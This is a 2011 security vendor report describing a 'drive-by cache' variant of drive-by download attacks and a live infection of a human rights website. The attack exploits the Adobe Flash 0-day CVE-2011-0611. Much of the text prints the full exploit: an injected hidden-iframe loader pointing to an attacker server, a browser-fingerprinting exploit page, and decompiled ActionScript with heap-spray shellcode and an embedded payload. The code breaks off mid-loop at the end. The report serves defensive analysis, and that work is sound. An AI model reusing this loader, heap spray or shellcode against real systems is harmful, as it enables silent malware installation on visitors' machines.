Newest Adobe flash 0-day used in new drive-by download variation: drive-by cache, targets human rights website

(Credits: Chris Hsiao, NightCola Lin, Wayne Huang)
Armorize runs one of the world's largest cloud-based Web malware scanning service, OEM'd to large security and hosting companies. Recently, we've noticed increasing use of a variation of the drive-by download attack, coupled usually with 0-days. This is our technical report on the subject.

We realize in recent years, "interesting" threat names have been regularly created, for example the popular [cross-X Y-ing] convention. Sometimes X can be as big as cloud. Nevertheless we feel we need to give this method a unique name; we'll dub it Drive-By Cache. Here's a summary of this report:

A. The method of attack is a variation of the drive-by download mechanism; we dub it "drive-by cache." This mechanism makes the infection harder to detect than drive-by download.
B. Here we use a recent example reported by our scanners. The infected site is human rights website, and the exploit itself is the Adobe flash 0-day CVE-2011-0611, which Adobe patched yesterday. HackAlert first flagged this infection about a week ago, when there was no patch available for this 0-day.
C. The installed malware connects back to 182.237.3.105, an IP in Hong Kong.

More summary can be found in [5. Forensics Summary].

[Sections]
1. Brief overview of drive-by downloads
2. Drive by cache
3. Real-world example
4. Detection Rates
5. Forensics Summary
6. Complete codes

[1. Brief overview of drive-by downloads]

A drive-by download attack refers to the process of a user visiting an infected page and subsequently gets installed with malware, without his/her knowledge and without having him/her to click on or to agree to anything. Our previous post on HDD spreading itself via malvertising is a typical example of this type of threat.

This type of threat has been in existence since 2000, and as heap-spraying techniques matured around 2003, has become widespread. The use of the term "drive-by download" to describe such threat, however, didn't receive widespread acceptance until Google's 2003 publication of their "Ghost in the Browser" paper (Provos et al.); prior to that the term drive-by download was used to describe multiple web-based malware threats (drive-by downloads, click-by downloads, phishing, etc). During 2003, the meaning of drive-by download became mature and specific, referring to the type of Web malware threat as described in Google's Ghost paper.

Below is a simplified illustration of this process; a more detailed description, with animation, can be found in our 2009 BlackHat / DEFCON drivesploit presentation pages 15-17.

In step 1, the victim visits an infected site, which has been injected with some malicious javascript (or flash). The injected javascript can create an iframe pointing to some hop points, or it can directly be an exploit. Doesn't matter. What's important is ultimately, the browser loads an exploit, often in the form of javascript or flash. In the example we're using here, it's an exploit for the Adobe flash 0-day CVE-2011-0611 vulnerability.

In step 2, the exploit runs inside the browser, exploits the browser, forcing the browser to execute some commands (called shellcode) that came with the exploit. The command would cause the browser process to make another connection to some URL, often not the same domain as the original infected domain, to fetch a piece of malware, write it to disk, and execute it. This is step 3.

It is difficult for desktop antivirus technologies to detect drive-by downloads statically using signatures (patterns). Browser exploits usually exist in the form of scripts, for example javascripts or flash actionscripts. They can be randomly obfuscated on-the-fly as they are served to victims; refer to the drivesploit presentation for the many creative ways attackers obfuscate script-based exploits. Collecting signatures for these randomly obfuscated and therefore "disposable" javascripts not only does not increase detection rates, it explodes one's signature database and causes detection speeds to drop (too many signatures to match against).

Behavior-based detection, on the other hand, is very effective for this type of threat. For drive-by downloads, the behavior is consistent and can be well defined. If we hook around the browser, the javascript engine, and various APIs, we will clearly see the following behavior, in sequential order:

A. Browser loads a URL (victim visits an infected site)
B. Exploit code executes and succeeds, so browser starts to execute shellcode that came with the exploit
C. Browser calls URLDownloadToFile() of urlmon.dll, which downloads some file from some URL and writes to disk as some file.
D. Browser executes the created file

Browser exploits love to call URLDownloadToFile(); for example, there are 8 drive-by download shellcodes listed on exploit-db, and all of them use URLDownloadToFile() for step (B).

But browsers don't normally call URLDownloadToFile() and therefore, the use of this API can be a good trigger point for behavior-based Web malware detection.

Generally speaking, to bypass behavior-based detection, shellcodes need to do as little as possible, and act as similar to the browser (call similar APIs) as possible. The simplest way to achieve this, is to have the browser do most of the work for the shellcode.

[2. Drive-by cache]

And drive-by caching does exactly this. In drive-by caching, a shellcode doesn't do Step (C). After being executed, it doesn't make an attempt to download a file and write it to disk. Instead, it locates the malware which is already sitting in the browser's cache directory, and executes it.

And that's why we take out the word download and dub it drive-by cache.

But how did the malware binary make its way into the browser's cache, BEFORE the exploit was executed? See illustration below:

For typical drive-by downloads, the process is:

(1) Browser load URL
(2) Browser executes exploit code
(3) Browser executes shellcode
(4) Shellcode downloads malware to disk
(5) Shellcode executes malware

In drive-by cache, step (4) is now performed right after step (1) and before step (2). It's also performed by the browser and not the shellcode. How is this done?

Well it's very simple. The malware binary is renamed as a .jpg or .js file and linked to in the infected page. In the example we use here with the recent infection, the code is:
<script src=newsvine.jp2>

The above line tells the browser that it should include "newsvine.jp2" as javascript. The browser then goes to a) retrieve this file, b) writes it to cache, and c) execute the javascript. Of course step (c) would fail because newsfine.jp2 is a PE binary (malware), but now, the file has been retrieved by the browser and written to the cache directory.

Note that all this is done by the browser and not the shellcode, and the browser executes this of course with a different set of APIs other than URLWriteFileToDisk.

To a behavior analysis engine, a) this is quote normal browser behavior and no suspicious APIs are being called, and b) this is happening right after step (1) (see illustration above) and therefore this isn't the typical drive-by download behavior sequence.

And because of the above, compared to drive-by download, drive-by cache is more likely to bypass security detection mechanisms.

[3. Real-world example]

At the time of this writing, this human rights website is still infected with this exploit, which leverages a) drive-by cache and b) the recent Adobe flash 0-day CVE-2011-0611. HackAlert first detect the infection about a week ago, and also flagged a non-standard drive-by download behavior.

The infection can be found at the bottom of the html:
</div><script src="/includes/googlead.js"></script></body></html>

/includes/googlead.js creates an iframe to the malicious domain:
if (document.cookie.indexOf('popad') == -1) {
var e = new Date();
e.setDate(e.getDate() + 1);
e.setHours(0, 0, 0);
e.setTime(e.getTime());
document.cookie = 'popad=true;path=/;expires=' + e.toGMTString();
document.write("<iframe frameborder=0 style='position: absolute; top:-9999px;left:-9999px' src='http://71.6.217.131/dir/AI/exploit.html' width=468 height=60 scrolling=no></iframe>");
}

The exploit (which is still live right now) is served from http://71.6.217.131/dir/AI/exploit.html. Full content of this exploit is listed at the bottom of this report. Here's one of the important sections:
var display="<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n"+"<script src=newsvine.jp2><\/script>\r\n"+
"<object width=\"550\" height=\"400\">\r\n"+
"<param name=\"movie\" value=\"done.swf\">\r\n"+
"<embed src=\"display.swf\" width=\"550\" height=\"400\">\r\n"+
"<\/embed>\r\n"+
"<\/object>"

Which writes out:
<script type="text/javascript">
window.onerror=function(){return true;};
</script>

<script src=newsvine.jp2></script>

<object width="550" height="400">
<param name="movie" value="done.swf">
<embed src="display.swf" width="550" height="400"></embed>
</object>

"display.swf" is the flash swf file containing the actual exploit code written in flash ActionScript. Full decoded version of the code can be found at the bottom of this report. <script src=newsvine.jp2><\/script> does the drive-by caching. newsvine.jpg's original name is swf.exe, and is a backdoor written in VB, possibly of the pincav family. Here it is renamed to newsvine.jp2, and its url is placed iin a <script> tag. Processing this tag, the victim's browser will proceed to download newsvine.jp2 and write it to the cache directory.

Subsequently, display.swf is downloaded by the browser, and the ActionScript it contains is executed. The script exploits the CVE-2011-0611 Adobe Flash 0-day, and causes the shellcode to execute. The shellcode looks in the browser's cache directory for newsvine.jp2 and executes it.

Newsvine.jp2 (or swf.exe) connects back to CNC server at jeentern.dyndns.org:80, which resolves to 182.237.3.105 at the time of this writing.

[4. Detection Rates]

The exploit code is in flash ActionScript and is located within swf files. Because this isn't the traditional drive-by download shellcode, but rather drive-by cache, detection rate seems low. When we submitted the swf file to VirusTotal, 0 out of 42 antivirus vendors detected this exploit.

As for newsvine.jp2 (swf.exe), we got 1/42 on VirusTotal (report is here). Only Microsoft detected this backdoor.



[5. Forensics Summary]

Here's what we know so far:

1. The human rights website has been infected (in multiple pages) at least a week ago, and is still infected right now.
2. drive-by cache is used instead of drive-by download
3. exploits CVE-2011-0611 Adobe Flash 0-day
4. VirusTotal detection was 0 out of 42 for the swf exploits, and 1 out of 42 for the malware.
5. exploit served by http://71.6.217.131/dir/AI/exploit.html, which we believe is a compromised server in San Diego, hosted by Cari.Net.
6. newsvine.jp2, originally swf.exe, is drive-by cached and then executed by the shellcode. It a backdoor written in VB, possibly of the pincav family. It has an invalid digital signature pretending to be the Xunlei download manager, which XunLei claims to be the world's most widely used download manager. Interesting strings within the binary suggest the author to be "chuang" or "zchuang".
7. newsfine.jp2 connects back to CNC server at jeentern.dyndns.org:80, which resolves to 182.237.3.105, an IP in Hong Kong.

[6. Complete codes]

Below we include full exploit codes to this drive-by cache example. If you need anything else, please email Xwayne@armorize.comX (delete the two enclosing X's).

1. http://71.6.217.131/dir/AI/exploit.html:

<html>
<head>
<script type="text/javascript">
function getCookieVal(offset) {
var endstr = document.cookie.indexOf(";", offset);
if (endstr == -1) {
endstr = document.cookie.length;
}
return unescape(document.cookie.substring(offset, endstr));
}

function GetCookie(name) {
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) {
var j = i + alen;
if (document.cookie.substring(i, j) == arg) return getCookieVal(j);
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0) break;
}
return null;
}

function SetCookie(name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (2 < argc) ? argv[2] : null;
var path = (3 < argc) ? argv[3] : null;
var domain = (4 < argc) ? argv[4] : null;
var secure = (5 < argc) ? argv[5] : false;
document.cookie = name + "=" + escape(value) + ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) + ((path == null) ? "" : ("; path=" + path)) + ((domain == null) ? "" : ("; domain=" + domain)) + ((secure == true) ? "; secure" : "");
}

function DisplayInfo() {
var expdate = new Date();
var visit;
expdate.setTime(expdate.getTime() + (24 * 60 * 60 * 1000));
if (!(visit = GetCookie("vis1t"))) visit = 0;
visit++;
SetCookie("vis1t", visit, expdate, "/", null, false);
return visit;
}

function code() {
var num = DisplayInfo();
if (num < 3) {
return 1;
} else {
return 0;
}
}

function user() {

var weekDay = "<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n" + "<script src=newsvine.jp2><\/script>\r\n" + "<object classID=yg.dll#yg.e><\/object>\r\n" + "<object width=\"550\" height=\"400\">\r\n" + "<param name=\"movie\" value=\"done.swf\">\r\n" + "<embed src=\"March.swf\" width=\"550\" height=\"400\">\r\n" + "<\/embed>\r\n" + "<\/object>";
var display = "<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n" + "<script src=newsvine.jp2><\/script>\r\n" + "<object width=\"550\" height=\"400\">\r\n" + "<param name=\"movie\" value=\"done.swf\">\r\n" + "<embed src=\"display.swf\" width=\"550\" height=\"400\">\r\n" + "<\/embed>\r\n" + "<\/object>";

var Example = "<script type=\"text/javascript\">window.onerror=function(){return true;};<\/script>\r\n" + "<script src=newsvine.jp2><\/script>\r\n" + "<object classID=yg.dll#yg.e><\/object>\r\n" + "<object width=\"550\" height=\"400\">\r\n" + "<param name=\"movie\" value=\"done.swf\">\r\n" + "<embed src=\"Birthday.swf\" width=\"550\" height=\"400\">\r\n" + "<\/embed>\r\n" + "<\/object>";
var info = navigator.userAgent.toLowerCase();
var win = (navigator.platform == "Win32") || (navigator.platform == "Windows");
var ck = code();
var January = info.indexOf('msie 8.0');
var February = info.indexOf('msie 7.0');
var April = info.indexOf('msie 6.0');
var June = info.indexOf("windows nt 5.1");
var August = info.indexOf("windows nt 6.1");
if (January > 0 && June > 0 && ck == 1) {
document.body.innerHTML = "xxxx" + weekDay;
}
if (June > 0 && ck == 1 && (February > 0 || April > 0)) {
document.body.innerHTML = "xxxx" + display;
}
if (January > 0 && August > 0 && ck == 1) {
document.body.innerHTML = "xxxx" + Example;
}
}
</script>
</head>
<body onload=user()>
</body>
</html>


2. Exploit in ActionScript, decoded from the swf files:

package ie_fla {
import flash.display. * ;
import flash.utils. * ;

dynamic public class MainTimeline extends MovieClip {
public
var s: Object;
public
var s2: Object;
public
var s3: Object;
public
var a: Object;
public
var t: Object;
public
var i: Object;
public
var r: ByteArray;
public
var ldr: Loader;

public

function MainTimeline() {
addFrameScript(0, this.frame1);
return;
} // end function
public

function hexToBin(param1: String): ByteArray {
var _loc_2: String;
var _loc_3: * = new ByteArray();
var _loc_4: * = param1.length;
var _loc_5: uint;
_loc_3.endian = Endian.LITTLE_ENDIAN;
while (_loc_5 < _loc_4) { // label _loc_2 = param1.charAt(_loc_5) + param1.charAt(_loc_5 + 1); _loc_3.writeByte(parseInt(_loc_2, 16)); _loc_5 = _loc_5 + 2; } // end while return _loc_3; } // end function function frame1() { this.s = new ByteArray(); this.s3 = new ByteArray(); this.a = new Array(); this.t = "4357530acc050000789c4d546d6c5365143eb7bdedfb765d29dd189dac2053f00345e3171f71b062bbeec3b63377b0a026c265bddd6decdaa6f7d61698a82466fb619610e20549f8322144134d10158d261287c9f8e10f31460da2268b4663628cc1080c37cf79efb5f5fe787bee799ef39cf39c7b7b6be0d901103c01d02e413c047875bb4f7b00ac66f0007b757abc95cde1b1a8e5a80b92321eed30d9063ed8028f410ce2d00309e8853ee887935321c86859b592374102790db8e0b0643501db7ebebf8f9dee7effdc4e2c0778cd85e4a885ea4bcd923fb90b93cd3021813b8c8728f84def4cb32587be3f6317d4f3076eae5bc60aee8b3fd585dac00a6033bcdce2e4947c7d216c794196641797d27d5478e58594ca6e7bf19d63762179f985981f00a13cf1e05af6f7879f5fb251e50ed494ddb2c44812455c0a0d3b75e2c9bd62d856a05b37627e0a16868a5ce49bc062206a384448377ee3be28fbc8f3c527b6aee502ee567aa966e781c3f78b1abf6d1c21592260f5feb9b8007cf004b90ee3901bc5906c15bb8b5dbb7ced6b47cc0f8d016564f52d10cbef0ead67576ffe3e53dfd0d579127793f8db7cc31a212ec366cb07dc63afcc1bed425e45740926d73ecefe387be95dbb3e828e3863190c0785a5b472bb8b9d79ebbb7f6c3ca5842329929ed9f65945487b40096f8ae0749c739fbd8c26bc47ebfe3476d92076373d7f3ce8d8b73a81373b3c1eb08345dcc3838dd043d32d0cd2c4ff3149e4e5edaf3c22441860034c4cac1ed79d04f55b3cc5c99eeb6e580e582bbcca12e7446dffe1dbbdce3353c2e42baf5f8cb28387d6398f6a105b9ec77714919335efbdec9989eb5fda4857b48bb29b8efcf928fb540b5c70f69452447afad6e7d7b3ae1ff7cfd4d3d4ed67ffb96d8e5d5c97581972073ede5763efc55e9a70debab030317be5e80ac10d805dfce6a97d03ce7fc4d9f5d9a737ef1219898a52b6813722dea7d8f0ecf553f5073f2b59a6ed9a87788bbdb85646205fc2dbf8d2c682c38db0bd11ded20897d9328b7907eff05218c0cb86237cb977aed3171df8a625e564b0f785791ab4f9af749b183428dead5f3b26bb593632d92dbe2571697295b40286cc72ae300a79ad306aea30a2abe55831a36d31215b2e8ec59c5b91c7dc886a68b055ab998962794c35c1c8ed416c47b65280e16733157d54d1c6f46cf501a352ae96abe3865eff1e8d6ae610917b3355fd7f70b55aa69b68f51e6c8e1cd2eea9995ac1843d55a3fa90cd74c0b8ba9b7e12c58299cc19a63d484ecb6720a5d2ec654d35b59eb192b93b557c2ea7c5f2b912987ace807e43a9140a64d3d0cc14f94916d5ccb05a3684ac56a26ab4b612560a8771d481116c932b5490db820b0d8175a734a75fdef8d556e3e160227a2c4bd9d20d88e2caff0522695d54"; this.i = 0; while (this.i < 1024) { // label this.s3.writeByte(13); var _loc_1: String; _loc_1.i = this.i++; } // end while this.i = 0; while (this.i < 1023) { // label this.s.writeBytes(this.s3, 0, this.s3.length); var _loc_1: String; _loc_1.i = this.i++; } // end while this.s.writeInt(2425393296); this.s.writeInt(2425393296); this.s.writeInt(3326443264); this.s.writeInt(1620086928); this.s.writeInt(3943717707); this.s.writeInt(868837049); this.s.writeInt(2231533620); this.s.writeInt(199418618); this.s.writeInt(3943033067); this.s.writeInt(4294967051); this.s.writeInt(3118523106); this.s.writeInt(3184599686); this.s.writeInt(1137894114); this.s.writeInt(3798573806); this.s.writeInt(1772287593); this.s.writeInt(3798590057); this.s.writeInt(2331142421); this.s.writeInt(2296888074); this.s.writeInt(350479074); this.s.writeInt(1912609418); this.s.writeInt(3520127714); this.s.writeInt(2327286151); this.s.writeInt(2427873764); this.s.writeInt(179692514); this.s.writeInt(3798534792); this.s.writeInt(3820685877); this.s.writeInt(3823297024); this.s.writeInt(462065361); this.s.writeInt(3504507537); this.s.writeInt(2324139702); this.s.writeInt(1776552667); this.s.writeInt(3823297129); this.s.writeInt(176743355); this.s.writeInt(173794274); this.s.writeInt(3791657833); this.s.writeInt(912330422); this.s.writeInt(1763576316); this.s.writeInt(3138065634); this.s.writeInt(3806509067); this.s.writeInt(534962914); this.s.writeInt(3112755848); this.s.writeInt(3803426993); this.s.writeInt(2296520116); this.s.writeInt(4195031010); this.s.writeInt(3806464575); this.s.writeInt(488447361); this.s.writeInt(2407976071); this.s.writeInt(2592588493); this.s.writeInt(2713887917); this.s.writeInt(2965556656); this.s.writeInt(3267413943); this.s.writeInt(2980556978); this.s.writeInt(2964169899); this.s.writeInt(2930231230); this.s.writeInt(2928509315); this.s.writeInt(2395124103); this.s.writeInt(2526448524); this.s.writeInt(2240921270); this.s.writeInt(2274333325); this.s.writeInt(2424541339); this.s.writeInt(3266022550); this.s.writeInt(2274397319); this.s.writeInt(2529338507); this.s.writeInt(2391249342); this.s.writeInt(3233990539); this.s.writeInt(3266030786); this.s.writeInt(3398207381); this.s.writeInt(2442431372); this.s.writeInt(2278083720); this.s.writeInt(2463157186); this.s.writeInt(2796405450); this.s.writeInt(3397488518); this.s.writeInt(3431438983); this.s.writeInt(3267415425); this.s.writeInt(3263596430); this.s.writeInt(3268252098); this.s.writeInt(3348531087); this.s.writeInt(2462563985); this.s.writeInt(2491517581); this.s.writeInt(2442579079); this.s.writeInt(2592588484); this.s.writeInt(3301081485); this.s.writeInt(2459681472); this.s.writeInt(3347824834); this.s.writeInt(3348531087); this.s.writeInt(2462563985); this.s.writeInt(2491517581); this.s.writeInt(2442579079); this.s.writeInt(2592588493); this.s.writeInt(2613232836); this.s.writeInt(3263270790); this.s.writeInt(3431438983); this.s.writeInt(3268248002); this.s.writeInt(2442560400); this.s.writeInt(2529347478); this.s.writeInt(2274333383); this.s.writeInt(3197211777); this.s.writeInt(2324533654); this.s.writeInt(3431438983); this.s.writeInt(3234581474); this.s.writeInt(182918429); this.s.writeInt(495030150); this.s.writeInt(3431438983); this.s.writeInt(3792313372); this.s.writeInt(488476050); this.s.writeInt(2274157153); this.s.writeInt(646349673); this.s.writeInt(1030350534); this.s.writeInt(1629941345); this.s.writeInt(183835906); this.s.writeInt(1658456726); this.s.writeInt(3898792459); this.s.writeInt(2531746522); this.s.writeInt(160953187); this.s.writeInt(2598859378); this.s.writeInt(1920112362); this.s.writeInt(1763555177); this.s.writeInt(242197223); this.s.writeInt(486673117); this.s.writeInt(3806519841); this.s.writeInt(1658456726); this.s.writeInt(3898792459); this.s.writeInt(2531746522); this.s.writeInt(160953187); this.s.writeInt(2598859378); this.s.writeInt(1920112130); this.s.writeInt(2330650850); this.s.writeInt(3798967015); this.s.writeInt(486673141); this.s.writeInt(3806519841); this.s.writeInt(183755490); this.s.writeInt(3797611491); this.s.writeInt(3865190638); this.s.writeInt(3792298170); this.s.writeInt(554310429); this.s.writeInt(488487204); this.s.writeInt(3847908285); this.s.writeInt(3817088421); this.s.writeInt(3877437985); this.s.writeInt(2976464561); this.s.writeInt(2292353762); this.s.writeInt(4074955445); this.s.writeInt(1772416522); this.s.writeInt(2585599261); this.s.writeInt(3122770868); this.s.writeInt(1771560553); this.s.writeInt(2529991393); this.s.writeInt(397699476); this.s.writeInt(3269531601); this.s.writeInt(732668751); this.s.writeInt(3777483065); this.s.writeInt(3982291672); this.s.writeInt(882305571); this.s.writeInt(702931256); this.s.writeInt(2718503897); this.s.writeInt(4254533052); this.s.writeInt(1773979361); this.s.writeInt(1065642478); this.s.writeInt(2842279166); this.s.writeInt(3779029478); this.s.writeInt(1776363337); this.s.writeInt(3166380298); this.s.writeInt(1109335325); this.s.writeInt(3499521006); this.s.writeInt(1732070745); this.s.writeInt(2171286445); this.s.writeInt(4232480269); this.s.writeInt(3045388061); this.s.writeInt(2062086682); this.s.writeInt(3123304899); this.s.writeInt(3806520034); trace(this.s.length); this.i = 0; while (this.i < 176) { // label this.s2 = new ByteArray(); this.s2.writeBytes(this.s, 0, this.s.length); trace(this.s2.length); this.a.push(this.s2); var _loc_1: String; _loc_1.i = this.i++; } // end while this.r = this.hexToBin(this.t); this.ldr = new Loader(); this.ldr.loadBytes(this.r); stop(); return; } // end function } } //============================================== package ie8_fla { import flash.display. * ; import flash.system. * ; import flash.utils. * ; dynamic public class MainTimeline extends MovieClip { public var s: Object; public var s2: Object; public var s3: Object; public var a: Object; public var i: Object; public var j: Object; public var sc_len: uint; public var t: Object; public var r_cn: ByteArray; public var ldr_cn: Loader; public var r: ByteArray; public var ldr: Loader; public var r_jp: ByteArray; public var ldr_jp: Loader; public function MainTimeline() { addFrameScript(0, this.frame1); return; } // end function public function hexToBin(param1: String): ByteArray { var _loc_2: String; var _loc_3: * = new ByteArray(); var _loc_4: * = param1.length; var _loc_5: uint; _loc_3.endian = Endian.LITTLE_ENDIAN; while (_loc_5 < _loc_4) { // label _loc_2 = param1.charAt(_loc_5) + param1.charAt(_loc_5 + 1); _loc_3.writeByte(parseInt(_loc_2, 16)); _loc_5 = _loc_5 + 2; } // end while return _loc_3; } // end function function frame1() { this.s = new ByteArray(); this.s2 = new ByteArray(); this.a = new Array(); this.sc_len = 0; this.t = "4357530a22060000789c5d547d4c5b55143faf5ff742617c38e806ad01743a9d0a861931822b520a685bb4632c6e0a2bf4d136a52de97bf5019b1fdb7423d982c69017e6321d31e8a2c9dcdc8c2133e81fc62d0edd747f90cc8f3847164de6b268a2532778cfbd0f4abc49efbbeffcceef9cdff9ddf40d82b51ba0e030c02a093c45c0d606f3bf56003d0fac40761fed71910beff7b856141f32c12716b695c0483150688447a1093cd00c5e688156182d809eb41c8a830496bbc1045b253d17c8e5df6ab61167feb937b73126c00113dc09eebd12981d6ce319d393431269dcb2675e64f0f801eca2e7b3526c99f94e91fbd98243b78145b29828e77eb3beaa9adc7bf6fbf3821b68d599e44bb7556bbe1e16c803d4fc25128f01226dc1da4e8ee440f00e0cccfc5852c30385d8cd62b648049bb1f2a620e266f682cf9fbf3af30ccfcb05bb4e802751400527eabeee20bed3f7bd27143875135033e736406725e7d8a1850fcc208bf40442c726bbda38b412705a071358c5fbcc1df921c08122d0ed9055636119be05b6c10256313f82adafa4bc8f91d5af4e7d285aeb3940adc22a9b1bf1b70267b793a78faf7f49e0f58cbe9f6b3e54fdd7ada4e7bcedd2a266029490303bb6a3887307eb860d979c7eccf78fbf11271f444263223fe870fa8318df3f3ef61c5122f15dc6cd3560d0f7cbcb0f9213a5c367168bdb81529a232ccb6de006d9034c4b1de89540f30c80e68bc30a6aa505d9a315055d898cdfce05497895ed0b5c654769a48a07f3f9e48b75b8867f4edfe32296ba0b3f2dbb94c2518ade98ee824a6ec2e074d70b646fe3c48b4bee71ef2c12a541072678bb6e6c225313e45d91d0ce5aff09dcd88b3b4ed59235bb3d3386b16ed4f3c7ac678d71a7f5ee7a748805eda33b938695f54ea436bd32be997c3c103922a8c2c79b0f1cdd40cc5f3cf9a9e1a313a9f315659b8cf9fc4111fafd6a69cca826885b3e3fdc4a261feafe6891e8c7b4e877279fe26936bc2accdb79592b26cf3b477e5dde3530672e22c7cb6f5e5b228bb9e33766c2648cd41e5cfac75e97f43dc21d5a448b85d1b71004e94a5a424bb3d7e5c81e57658fabb3c73251a69096d35cdbd6cdd77bf12760272db7e5196b3162fd7f84a9d93e8f2a13b3b38f93d7d6ae3d695c1f0b35ee7b3b4dde611bff543d2cbd5e215dad99ac993bd57c6d7a6a6862ddb71777b58fb824176c54d3b16404fae564448d426f34946e4a85e54615fad2a94493f1cae32cd61b52e40ae89007556f2a9d08a9a0c48619d8dd974942673c9c8946827222daa7ddaf64d25a5adba1448dcf60445637626a4b588b2e03352d8d2f6e6d1debcd72b072f3a02a275518d614ad56641aa02734840f6f2aa9fa628a2a64c4e4fe30f843289d3552e5e6c4803ae44f3d1b939bfa6303a046630ab429c14c3289532ab2eac7717ca950b833945678597900d9ac6a2c9991a10267040f2b05be62e670d9dfe0669efe07c8b77774"; trace("if"); if (Capabilities.language.toLowerCase() == "zh-cn") { this.s.writeInt(2425393296); this.s.writeInt(2425393296); this.s.writeInt(202150032); this.s.writeInt(3943717707); this.s.writeInt(868837049); this.s.writeInt(1459781684); this.s.writeInt(199418618); this.s.writeInt(3943033067); this.s.writeInt(4294967051); this.s.writeInt(3554730722); this.s.writeInt(3184599686); this.s.writeInt(1137894114); this.s.writeInt(3798573806); this.s.writeInt(1772287593); this.s.writeInt(3798590057); this.s.writeInt(2331142421); this.s.writeInt(2296888074); this.s.writeInt(786686690); this.s.writeInt(1912609418); this.s.writeInt(2396115170); this.s.writeInt(2324793991); this.s.writeInt(2394319332); this.s.writeInt(181396450); this.s.writeInt(3798534792); this.s.writeInt(3820685903); this.s.writeInt(3823297024); this.s.writeInt(459880033); this.s.writeInt(246835486); this.s.writeInt(167557899); this.s.writeInt(350413538); this.s.writeInt(3087736802); this.s.writeInt(3806509448); this.s.writeInt(3800621747); this.s.writeInt(2964424930); this.s.writeInt(498398731); this.s.writeInt(400745186); this.s.writeInt(171908381); this.s.writeInt(495030150); this.s.writeInt(3431438983); this.s.writeInt(3268256194); this.s.writeInt(2762846402); this.s.writeInt(3450913472); this.s.writeInt(3350704551); this.s.writeInt(2964500653); this.s.writeInt(2762714791); this.s.writeInt(3351162509); this.s.writeInt(2172882626); this.s.writeInt(2978453142); this.s.writeInt(2341242257); this.s.writeInt(3199633295); this.s.writeInt(2458751107); this.s.writeInt(2426127019); this.s.writeInt(2358675344); this.s.writeInt(2357696194); this.s.writeInt(2760609415); this.s.writeInt(2445197506); this.s.writeInt(3347825323); this.s.writeInt(2898446988); this.s.writeInt(2274726292); this.s.writeInt(2341242824); this.s.writeInt(3431502544); this.s.writeInt(3418531501); this.s.writeInt(3268070017); this.s.writeInt(2407976071); this.s.writeInt(2592588480); this.s.writeInt(3447833222); this.s.writeInt(2274280141); this.s.writeInt(2445461398); this.s.writeInt(2274333383); this.s.writeInt(3197211777); this.s.writeInt(2324533654); this.s.writeInt(3431438983); this.s.writeInt(3267675330); this.s.writeInt(2173538971); this.s.writeInt(3267413899); this.s.writeInt(3233990550); this.s.writeInt(2274333383); this.s.writeInt(3197211777); this.s.writeInt(2324533654); this.s.writeInt(3431438983); this.s.writeInt(3268254658); this.s.writeInt(3301229185); this.s.writeInt(2407976071); this.s.writeInt(2592588493); this.s.writeInt(2177012118); this.s.writeInt(2207291074); this.s.writeInt(3348531087); this.s.writeInt(2462563985); this.s.writeInt(2491517581); this.s.writeInt(2442579079); this.s.writeInt(2592587979); this.s.writeInt(3420588775); this.s.writeInt(488447361); this.s.writeInt(2407976071); this.s.writeInt(2592596490); this.s.writeInt(471604509); this.s.writeInt(2375190412); this.s.writeInt(3800621597); this.s.writeInt(3035259610); this.s.writeInt(177662050); this.s.writeInt(3658192615); this.s.writeInt(1658456471); this.s.writeInt(4083391207); this.s.writeInt(1920103026); this.s.writeInt(2531944733); this.s.writeInt(3077115503); this.s.writeInt(2733055234); this.s.writeInt(182313698); this.s.writeInt(3793838810); this.s.writeInt(177662050); this.s.writeInt(3658192615); this.s.writeInt(1658456471); this.s.writeInt(4083391207); this.s.writeInt(1920103026); this.s.writeInt(2516749034); this.s.writeInt(3907183215); this.s.writeInt(2733055234); this.s.writeInt(183886562); this.s.writeInt(3793816307); this.s.writeInt(3806519898); this.s.writeInt(4091799138); this.s.writeInt(552526345); this.s.writeInt(3770294538); this.s.writeInt(454892829); this.s.writeInt(3106202970); this.s.writeInt(1807606660); this.s.writeInt(631629597); this.s.writeInt(35762537); this.s.writeInt(1051822242); this.s.writeInt(2330129122); this.s.writeInt(3803539876); this.s.writeInt(3993672221); this.s.writeInt(488487457); this.s.writeInt(3014945175); this.s.writeInt(3731461836); this.s.writeInt(2598442932); this.s.writeInt(1771356897); this.s.writeInt(399584171); this.s.writeInt(2739921191); this.s.writeInt(3510234460); this.s.writeInt(4074255510); this.s.writeInt(3928173029); this.s.writeInt(3778585097); this.s.writeInt(333053335); this.s.writeInt(96233916); this.s.writeInt(3336650628); this.s.writeInt(1777248617); this.s.writeInt(3170820415); this.s.writeInt(1776708065); this.s.writeInt(659143867); this.s.writeInt(554313759); this.s.writeInt(488493206); this.s.writeInt(1945003837); this.s.writeInt(1297711467); this.s.writeInt(867040326); this.s.writeInt(2249045380); this.s.writeInt(4011702825); this.s.writeInt(3653493474); this.s.writeInt(3806461952); this.sc_len = this.s.length; trace("cn"); trace(this.s.length); this.j = 3084 - this.sc_len; this.i = 0; while (this.i < this.j) { // label this.s.writeByte(144); var _loc_1: String; _loc_1.i = this.i++; } // end while this.s.endian = Endian.LITTLE_ENDIAN; this.s.writeInt(2008988467); this.s.writeInt(3435973836); this.s.writeInt(2008964821); this.s.writeInt(3435973836); this.s.writeInt(2008944920); this.s.writeInt(2009023683); this.s.writeInt(3435973836); this.s.writeInt(2009016856); this.s.writeInt(202113024); this.s.writeInt(202113024); this.s.writeInt(8192); this.s.writeInt(64); this.s.writeInt(202116560); this.s.writeInt(0); this.s.writeInt(202116164); this.s.writeInt(0); this.s.writeInt(0); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.s.writeInt(3435973836); this.i = 0; while (this.i < this.sc_len) { // label this.s.writeInt(1676697940); var _loc_1: String; _loc_1.i = this.i++; } // end while this.s.writeInt(1676697940); this.s.writeInt(1676697940); this.s.writeInt(1676680900); this.s.endian = Endian.BIG_ENDIAN; this.j = 65536 - this.s.length; this.i = 0; while (this.i < this.j / 4) { // label this.s.writeInt(305419896); var _loc_1: String; _loc_1.i = this.i++; } // end while this.i = 0; while (this.i < 16) { // 